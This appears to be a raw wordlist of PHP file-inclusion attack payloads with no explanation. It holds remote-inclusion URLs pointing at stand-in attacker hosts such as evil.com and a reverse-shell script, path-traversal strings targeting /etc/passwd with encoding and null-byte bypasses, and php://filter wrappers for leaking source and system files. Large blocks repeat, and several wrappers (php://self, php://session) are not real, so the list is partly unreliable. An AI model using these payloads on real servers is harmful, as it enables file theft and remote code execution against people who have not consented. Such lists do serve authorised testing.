http://evil.com/shell.txt
http://evil.com/shell.txt%00
http:%252f%252fevil.com%252fshell.txt
../../../etc/passwd%00
%252e%252e%252fetc%252fpasswd
....//....//etc/passwd
..///////..////..//////etc/passwd
\\10.0.0.1\share\shell.php
http://attacker.example2.com/php-reverse-shell.php
php://filter/read=convert.base64-encode/resource=index
php://input
php://output
php://var/log/apache2/access.log
php://filter/read=convert.base64-encode/resource=/etc/passwd
ftp://user:pass@evil.com/shell.php
php://temp
php://session
php://stderr
php://stdout
php://memory
php://self
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://session
php://filter/convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://temp
http%3A%2F%2Fevil.com%2Fshell.txt
http%3A%2F%2Fevil.com%2Fshell.txt%00
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
http://evil.com/shell.txt
http://evil.com/shell.txt%00
http:%252f%252fevil.com%252fshell.txt
../../../etc/passwd%00
%252e%252e%252fetc%252fpasswd
....//....//etc/passwd
..///////..////..//////etc/passwd
\\10.0.0.1\share\shell.php
http://attacker.example2.com/php-reverse-shell.php
php://filter/read=convert.base64-encode/resource=index
php://input
php://output
php://var/log/apache2/access.log
php://filter/read=convert.base64-encode/resource=/etc/passwd
ftp://user:pass@evil.com/shell.php
php://temp
php://session
php://stderr
php://stdout
php://memory
php://self
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://session
php://filter/convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://self
php://filter/convert.base64-encode/resource=php://temp
php://filter/convert.base64-encode/resource=ftp://user:pass@evil.com/shell.php
php://filter/convert.base64-encode/resource=php://var/log/apache2/access.log
php://filter/convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://output
php://filter/convert.base64-encode/resource=php://self
php://filter/convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://temp
php://filter/convert.base64-encode/resource=ftp://user:pass@evil.com/shell.php
php://filter/convert.base64-encode/resource=php://var/log/apache2/access.log
php://filter/convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://output
php://filter/convert.base64-encode/resource=php://self
php://filter/convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://temp
php://filter/convert.base64-encode/resource=ftp://user:pass@evil.com/shell.php
php://filter/convert.base64-encode/resource=php://var/log/apache2/access.log
php://filter/convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://output
php://filter/convert.base64-encode/resource=php://self
php://filter/convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://temp
php://filter/convert.base64-encode/resource=ftp://user:pass@evil.com/shell.php
php://filter/convert.base64-encode/resource=php://var/log/apache2/access.log
php://filter/convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://output
php://filter/convert.base64-encode/resource=php://self
php://filter/convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://temp
